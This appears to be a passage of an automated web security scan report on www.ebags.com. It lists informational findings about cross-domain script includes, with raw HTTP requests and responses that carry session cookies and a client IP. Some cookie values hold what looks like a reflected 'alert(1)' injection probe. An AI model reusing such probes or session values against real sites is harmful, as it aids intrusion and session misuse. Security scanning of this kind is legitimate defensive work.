<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.28. http://www.ebags.com/department/bags-by-ebags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/bags-by-ebags

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://sv.liveclicker.net/service/getEmbed?client_id=17&widget_id=5361

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:58:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:53 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<td><script type="text/javascript" src="http://sv.liveclicker.net/service/getEmbed?client_id=17&widget_id=5361"></script>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
...[SNIP]...

5.29. http://www.ebags.com/department/business-and-laptop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/business-and-laptop

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/business-and-laptop HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.30. http://www.ebags.com/department/designer-handbags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/designer-handbags

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /department/designer-handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 58408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.31. http://www.ebags.com/department/handbags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/handbags

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /department/handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 71524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.32. http://www.ebags.com/department/kids-and-baby previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/kids-and-baby

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/kids-and-baby HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:39 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:39 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 65068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.33. http://www.ebags.com/department/luggage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/luggage

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/luggage HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 73000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js'></script>
...[SNIP]...

5.34. http://www.ebags.com/department/messenger-bags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/messenger-bags

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/messenger-bags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
